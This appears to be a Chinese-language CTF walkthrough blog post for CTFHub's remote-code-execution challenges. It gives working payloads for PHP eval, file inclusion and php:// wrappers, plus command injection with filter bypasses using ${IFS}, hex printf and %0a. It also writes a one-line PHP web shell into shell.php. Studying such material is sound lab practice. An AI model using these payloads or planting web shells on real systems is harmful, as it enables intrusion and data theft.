ctfhub技能树—RCE

eval执行

[huayang]Flag

看目录

/?cmd=system("ls");

没有想要的

继续

/?cmd=system("ls /");

进去拿

/?cmd=system("cat /flag_10452");

文件包含

Flag

先打开看看

再进去看看有什么

还是那个方法看看目录有啥子

先构建一个payload

http://challenge-3dbbafd3d8ce6c05.sandbox.ctfhub.com:10080/?file=shell.txt
ctfhub=system('ls');

打开flag文件

php://input

Flag

抓包改请求

转到repeater模块并查看目录

直接拿flag

读取源代码

Flag

看源码

提示我们要强制使用php://

直接用filter拿flag

http://challenge-2bf9e19442ae4f91.sandbox.ctfhub.com:10080/?file=php://filter/resource=/flag

远程包含

!警告!

一直用hackbar找不了flag

终于发现了问题

我们先来看一张图,这里我们把回显写上,post写上数据点击发送

什么都没发生

what???

我们来看看正常的会发生什么

很明显这不是我的问题

当我们加上 = 就会有一种刷新的感觉但post的参数还是没传上去

当我们再 = 前面加上随便一些东西时,奇迹出现了

暂时不是很能理解其中原理

Flag

过滤了get请求

既然hackbar不行就只有抓抓包了

注意构建post请求

因为知道机构就直接搞flag

命令注入

Flag

先输入127.0.0.1看看有什么

看一下目录

127.0.0.1;ls

打开php看看

看网上的大佬

方法1

写入管道符运行base64加密内容再打开

127.0.0.1;cat 118961902018996.php | base64

方法2

写一句话

127.0.0.1 ; <?php @eval(\$_POST['a']);?> >> shell.php

用蚁剑查看

过滤cat

Flag

方法和上一题一样

只不过过滤了cat第二种方法就要改一下

方法一

看目录

127.0.0.1;ls

打开文件

因为代码是直接过滤cat所以我们就写成ca\t / 是而不行的哦

127.0.0.1;ca/t flag_17579321643663.php

记得把#去掉,不然出不来

| base64

方法二

127.0.0.1 &<?php @eval(\$_POST['a']);?> >> shell.php

方法一样我就不用多写了

过滤空格

Flag

还是先看看文件名

直接搞出来

127.0.0.1;cat<flag_162753183510108.php|base64

试试一句话,貌似不行

过滤目录分隔符

Flag

第一步还是查目录

尝试打开,打不开说明被过滤了

只有用cd进入子文件夹

咱么进去看看

127.0.0.1;cd flag_is_here;ls

打开拿flag

127.0.0.1;cd flag_is_here;cat flag_11902389529876.php

在注释里////太坏了

过滤运算符

Flag

看目录

;ls

进去就完事了,我一直都是用的;而非&哈哈

;cat flag_200272708310671.php

又是在注释里,可恶

综合过滤练习

Flag

看这过滤就不想做了

太难了呀

百度看看别人的吧

直接在url上查看

127.0.0.1%0Als

继续,别问问就是不知道

使用hex编码 地址:http://stool.chinaz.com/hex

方法:

解出来不能直接加在url里,要转化一下

/?ip=127.0.0.1%0als${IFS}$(printf${IFS}"\x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65")

继续

/?ip=127.0.0.1%0aca''t${IFS}$(printf${IFS}"\x66\x6c\x61\x67\x5f\x69\x73\x5f\x68\x65\x72\x65\x2f\x66\x6c\x61\x67\x5f\x32\x31\x37\x38\x39\x32\x32\x30\x39\x32\x36\x33\x39\x39\x2e\x70\x68\x70")

完!

[/huayang]

==>转载请注明来源哦<==

评论

  1. Windows Edge
    7月前
    2021-4-27 14:09:28

    看看

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇